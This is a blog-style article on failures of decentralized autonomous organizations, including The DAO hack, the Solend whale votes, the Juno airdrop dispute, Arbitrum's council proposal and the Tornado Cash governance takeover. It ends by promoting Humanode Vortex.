When DAOs Fail

When DAOs Fail

A decentralized autonomous organization (DAO) is a popular form of governance structure, often seen in blockchain projects, that have no central governing body and whose members share (or are supposed to share) a common goal to act in the best interest of the entity or project.

Historically speaking, a DAO is a concept that can be traced back to the 1990s and was popularized by Vitalik Buterin, the creator of Ethereum, in 2014.  It can take multiple forms.  One could use a DAO to form a digital company running independently free of interference and 'backdoor deals', or it could be used to assist the implementation of Liquid Democracy-style vote delegation. There could be thousands of different types of DAOs, all with different sets of voting mechanisms, purposes, and limitations.

Unlike conventional centralized entities, DAOs have no central authority, and power is usually distributed across token holders who collectively cast votes.  All votes and activity throughout the DAOs are posted on a blockchain, meaning that all actions of the users are publicly viewable.

In simple terms, many believe that DAOs are emerging as the foundation for decentralized governance.

But, as all of us know, growth is accompanied by pain.  Who doesn’t remember embarrassing moments from when they were 13 or 14 years old?  You have to learn how to crawl before you walk or run.  It is guaranteed that you will fall down more than once or twice in the process.  And even then, when you learn how to run, you need to beware of traffic and of others who may have malicious intent.  To make things worse, everybody knows that the road to hell is paved with good intentions.

So, what happens when DAOs fail?  Although almost all incidences below were the result of “good intentions”, “unforeseen accidents”, or “human nature vs ideals”, there is much to learn from “how” and “what” went wrong.

One of the first that comes to mind, is the often misunderstood as "the heist of the century" " the DAO “hack” that caused Ethereum to fork into Ethereum and Ethereum Classic.

The DAO was one of the first frameworks that tried to realize the “vision” explained in Vitalik's whitepaper. Built by Slock, it is a traditional software consulting company, as a free, libre open source framework for anyone to modify, launch, and operate DAOs as they see fit. 

One group of talented, hardworking, unpaid volunteers, then took the framework and were able to gain traction and launch “The DAO” as an investor-directed venture capital fund on the Ethereum Chain.  The DAO launched in April 2016, and became one of the largest crowdfunding campaigns in history, raising 11.5 million ETH via a token sale. 

At the time, those tokens were worth $150 million.  Unfortunately, a flaw in the Ethereum programming language dubbed a 're-entrancy attack' was used, and the hacker/troller drained ⅓ of the ETH from "The DAO".  This means, that 50 million USD was vandalized, and siphoned into various "sub DAOs".

What is amazing, is that if that money actually made it off the chain, it would have been worth $11,207,340,000 in today’s value.

Fortunately, the smart-contracts had a 28-day holding period, meaning that the money did not go poof, and eventually, the Ethereum Network was hard forked to move the funds to a recovery address where they could be exchanged back to Ethereum by their original owners, but forever left Ethereum forked into Ethereum, and Ethereum Classic.  

A grand idea full of good intentions, but haunted by faulty code.  One could say that Solidity was developed as the language for smart-contracts on Ethereum with extra security in mind to prevent further similar hacks.  Oh, and the “re-entrancy attack”?  It still plagues Ethereum-based projects, and contracts, even using Solidity, to this day.

Voter Apathy and Plutocracies

DAOs are designed to remove centralized hierarchies so that they can promote collective governance through on-chain voting.  Unfortunately, due to various reasons, a shockingly high number of DAOs fail due to Voter Apathy.  Even if you look at Uniswap, one of the biggest DAOs in the crypto space, the average voter turnout is 0.33%, and according to Xuan Liu’s (Author of The Illusion of Democracy? An Empirical Study of DAO Governance and Voting Behavior, 2023) comprehensive study of over 50 popular DAOs, on average, only about 1.77% of those eligible, vote.

Then again, if you look back at a report from June 2022 by Chainalysis, less than 1% of all holders in the 10 major DAOs, have 90% of the voting power.  In short, many “decentralized” systems and DAOs resemble plutocracies where only the richest participants can or do actually influence the outcome of the proposals.

Although there are plenty of DAOs that have failed due to voter apathy and voter gridlocks, such as MCC DAO which focused on building tools for launching and managing DAOs on Ethereum, nothing compares to the mess that the Solana-based lending and borrowing DAO, Solend faced.

One day, Solend discovered that a single ‘whale’ had gained a near-monopoly on two of the protocol’s available lending assets, risking a potential crash of its underlying SOL / SLND ecosystems. This whale had deposited 5.7 million SOL tokens to use as collateral for borrowing $108 million worth of USDT and USDC.  This amounted to 95% of all SOL deposited and 88% of all USDC borrowed from the main asset pool, and this equaled 25% of the Total Value Locked on the platform.  The problem was, that if the price of SOL dropped to $22.30, 20% (or $21 million worth of SOL) of this whale’s ‘borrows’ would be liquidatable… and if that happened, well, it couldn’t really be absorbed by the market, potentially causing a crash, and may have very well been the end of Solend, and would have been a nasty blow for Solana.

The thing was, people noticed it, causing others to withdraw as much as they could, making “utilization” of USDC and USDT to jump to 100%, and lock everyone else inside.  To make bad go worse, other positions that used USDT or USDC as collateral could not be liquidated either now.  Panic started to set in, and it looked like the ship was about to sink.

What did they do?  They proposed their very first governance vote on their DAO to grant Solend Labs “emergency power” to take control of the whale’s account, and liquidate the 20% OTC, rather than have it go through the DEX, if push comes to shove.

It was an emergency vote conducted within a few hours, and less than 1% of the voters voted on it…, but the YES vote won 1.1 million to 30,000.  Clean victory right?  Well, not so. 98% of the 1.1 million votes, came from a single user.

The community was livid.  People started to realize two big issues.  That this may not be a true “democracy”, and that the “assets deposited into the platform can be confiscated by the team at any time”.  All they needed to do was have a couple of whales with governance tokens vote together, and others could theoretically be wiped out.

Shortly thereafter, a second emergency vote was put in place to nullify the first vote, and to set in place a 24-hour timeframe for voting, rather than the original 3 or so hours.  This also passed thanks to the 1 million votes held by a single user.   Then a third vote was put in place to limit the amount a user could borrow and immediately enact rolling, per-account liquidations of positions that exceed its proposed $50 million limit on individual accounts (in this vote, the 1 million vote holder was only 67% of the YES vote that won with 99.7% of all votes).

Around this time, the price of SOL stabilized and the immediate danger was averted, but the whole fiasco highlighted the dangers of one user having a majority of the voting power in a DAO, and the potential dangers of being able to “re-write” the ledger to allow third parties access user’s accounts.

The Cosmos-based Juno blockchain serves as another reminder of the challenges blockchain-based governance faces, but also a test of one blockchain community’s values.

The story goes like this.  Juno, who had just launched, decided to hold an airdrop to bring in new users.  Being smart, they held a “stakedrop”, and rewarded JUNO tokens 1:1 for ATOM tokens “staked” on the Cosmos Hub blockchain.  Unfortunately, since BotBasher by Humanode had not been introduced to the world yet, Juno kept it simple and set a cap of 50,000 JUNO for any individual wallet.  What they didn’t expect was, a single user to go Sybil on them and prepare 50 different wallets.   In short, the user had formed an “investment group”, and gathered enough ATOM tokens to claim 10% (roughly $120 million at that time) of JUNO’s total token supply in the airdrop.

It may have gone unnoticed, but this user who thought he should eventually return the ATOM tokens to “his” investors and “clients”, gathered all of the tokens into one single wallet, and he was bustested.

Although one of the founders of Junos believed that this should not be reversed, the community did not agree, and a proposition was made to strip the user of the “ill-gained” tokens, leaving him with only 50,000 tokens.  The gains that were revoked were to be moved into a community-controlled Unity contract, and then the community could vote on how to use the funds.  *note: by this time the token had tanked 60%, and the $120 million was now worth $36 million.

Yes, there were threats of legal action, and everything got messy.  But as a final kick, due to a copy-and-paste error in the smart contract, the funds were sent to an erroneous address on the blockchain that nobody had access to.  Oops.

In the end, other propositions had to be voted on, and new code had to be put in place to rewrite Juno’s ledger so that the stranded funds were reassigned to Unity.    Needless to say, this ordeal cast a shadow on the future of Juno, and combined with the network being shut down a number of times due to numerous mysterious smart-contract attacks, the token that was worth $40 at one time, is currently worth $0.2.

Governance is hard

Governance in general is hard.  That is nothing new.  When structuring a new organization’s governance structure, the best advice that one could give is to “build for growth”.

If you start out building based on “what is easier” for the sake of speed, the result is often little to no governance and expensive mistakes, but if you build based on a rock-solid ideal based on well-established highly professional practices with multiple rigid checks and balances, the result is often a ship built out of concrete that sinks before it sails.

One DAO that discovered that the hard way, was Arbitrum DAO.  Their governing model is labeled as “full on-chain governance”.

The issue started to become apparent when Arbitrum started to realize that voter apathy was an issue, and not everyone will always vote on small issues.  Too many things to vote on, and people just don’t show up to vote.  They realized that when in a cycle of growth, speed is needed, but the “governance was getting clogged up by grants proposals, and too many small proposals would cause voter fatigue”.

Thus, the 12-member council of the Arbitrum DAO got together and made a proposal that included moving 750 million ARB tokens, which was worth nearly $1 billion, to the Arbitrum Foundation so that it could bypass the “full on-chain governance” and make quick decisions on who to give the grants for what.  The goal was to speed up the process so that they could keep up with the growth.  

Unfortunately, the community did not agree.  In the very same proposal, Arbitrum had talked about how every vote counted in “full on-chain governance”, and that “full on-chain governance” was the core of the project.  So then why create a “backdoor”?  Who’s pet project will the money go to?

Over 70% of those who voted, voted NO, and the council had to retract the proposal.  Back to the drawing board…

Hack the way to power?

One common issue in many DAOs, is the fact that money (tokens held)  = voting power (and the power of proposals).  Yes, plutocracy, as mentioned above, is an issue, and plutocracy is one of the main contributors to voter apathy, especially when many believe that the only value their governance tokens have is monetary value and, thus are just held to sell when the price is right.

Tornado Cash DAO (built as a “privacy-preserving mixer” on Ethereum) found out that governance tokens are not always the answer to proper governance, the hard way, when an attacker floated a malicious proposal that hid a malicious code that allowed for the update of logic that gave the attacker access to all governance votes.  The attacker then simply withdrew 10,000 votes as TORN and sold it all, minted himself 1.2 million TORN (worth over $4 million at the time), exchanging 380,000 of the TORN tokens gaining 372 ETH, and then ran it back through the privacy protocol.

This attack was not an exploit of any smart contracts or technology related to the working of Tornado Cash, it was just a little malicious code attacking the DAO.  What he did was make a proposal that asked community members to vote for or against increasing the amount of staked TORN tokens needed to become a Tornado Cash relayer and penalize relayers attempting to avoid having their stake slashed.  He claimed that his proposal was based on the same logic as a prior proposal that had already passed, and the voters failed to check the logic.  

What people did not expect, was that this proposal added a self-destruct function that replaced the original proposal with a brand-new, malicious one.  This gave him the power to withdraw all locked governance votes and drain all the tokens from the governance contract.  The hacker, or more likely a giga-troll, then turned around and made another proposal to revert all the damages that he did, and promptly reverted the damages done.

Naturally, even if Tornado Cash had a perfect DAO, it wouldn’t have saved them from indictments for creating a platform that laundered $7 billion in crypto, and allowed $1 billion in criminal proceeds to be laundered through their service, including hundreds of millions from the Lazarus Group, a sanctioned North Korean cybercrime organization… Having said that, they did provide the world with a good example of what could go wrong in a DAO if people are not paying attention.

With all the growing pains and failures in DAOs, DAOs are still seen as the path forward.  It is just that the ideal DAO has not been determined yet.  But each failure teaches us a valuable lesson, and with each lesson that is properly addressed by the communities, the DAOs will only grow stronger.  Perhaps it may be time to take a look at what the Humanode Vortex brings to the table to address many of the issues seen in today's DAOs.